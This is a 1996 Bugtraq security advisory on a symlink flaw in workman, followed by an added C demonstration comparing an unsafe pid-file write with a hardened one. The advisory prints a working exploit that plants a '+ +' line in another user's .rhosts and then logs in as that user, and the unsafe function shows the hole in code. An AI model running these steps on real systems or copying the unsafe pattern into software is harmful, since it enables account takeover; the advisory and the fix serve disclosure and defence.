[3281] in bugtraq


r00t advisory -- workman vulnerability

daemon@ATHENA.MIT.EDU (Gregory Hull)
Mon Aug 26 17:57:15 1996

Date: 	Mon, 26 Aug 1996 12:21:15 -0400
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Gregory Hull <gahull@ccs.neu.edu>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

r00t advisory                                           [ workman       ]
                                                        [ Aug 25 1996   ]

-- Synopsis
There exists a vulnerability in workman that will allow any user to create
and write to files owned by the user who is running workman.  Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to its
target.

-- Exploitability
The exploit is absurdly simple:
$ ln -s /home/target_user/.rhosts /tmp/.wm_pid
# wait for target user to run workman
$ echo "+ +" >/home/target_user/.rhosts
$ rlogin -l target_user localhost

-- Fixes ?
The author of workman has been alerted to this problem and a patch is available
from ggal@ccs.neu.edu.

r00t -- http://www.r00t.org
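
The file-creation pattern described in the synopsis, next to a hardened form, as an added example that is not part of the original advisory and is not workman's source or the patch mentioned above. The function names and the scratch directory are assumptions made for illustration; the scenario runs entirely inside a private directory created with mkdtemp.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the advisory describes (assumed reconstruction, not workman's code):
 * the open follows a symlink and the result is left mode 666. */
static int write_pid_unsafe(const char *path) {
    FILE *f = fopen(path, "w");          /* follows a pre-existing symlink */
    if (!f) return -1;
    fprintf(f, "%ld\n", (long)getpid());
    fclose(f);
    return chmod(path, 0666);            /* world-writable, applied through the link */
}

/* Hardened: O_EXCL refuses any existing name (symlinks included),
 * O_NOFOLLOW is belt-and-braces, and the file is owner-only. */
static int write_pid_safe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;               /* EEXIST when a link already sits there */
    dprintf(fd, "%ld\n", (long)getpid());
    return close(fd);
}

/* Constructed scenario: a symlink already occupies the pid-file name.
 * Returns the permission bits of the link target after the writer ran,
 * -1 if the target was never created, -2 on setup failure. */
static int target_mode_after(int (*writer)(const char *), int *writer_rc) {
    char dir[] = "/tmp/wm_demo_XXXXXX", lnk[64], target[64];
    struct stat st;
    if (!mkdtemp(dir)) return -2;
    snprintf(lnk, sizeof lnk, "%s/.wm_pid", dir);
    snprintf(target, sizeof target, "%s/victim_file", dir);
    if (symlink(target, lnk) != 0) return -2;
    *writer_rc = writer(lnk);
    int mode = (stat(target, &st) == 0) ? (int)(st.st_mode & 0777) : -1;
    unlink(target); unlink(lnk); rmdir(dir);
    return mode;
}

int main(void) {
    int rc, mode = target_mode_after(write_pid_unsafe, &rc);
    printf("unsafe: rc=%d target mode=%o\n", rc, (unsigned)mode);
    mode = target_mode_after(write_pid_safe, &rc);
    printf("safe:   rc=%d target created=%s\n", rc, mode < 0 ? "no" : "yes");
    return 0;
}
```

With the hardened writer the program fails closed when the name is already taken, which is the condition worth logging: an unexpected entry at a predictable /tmp path.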
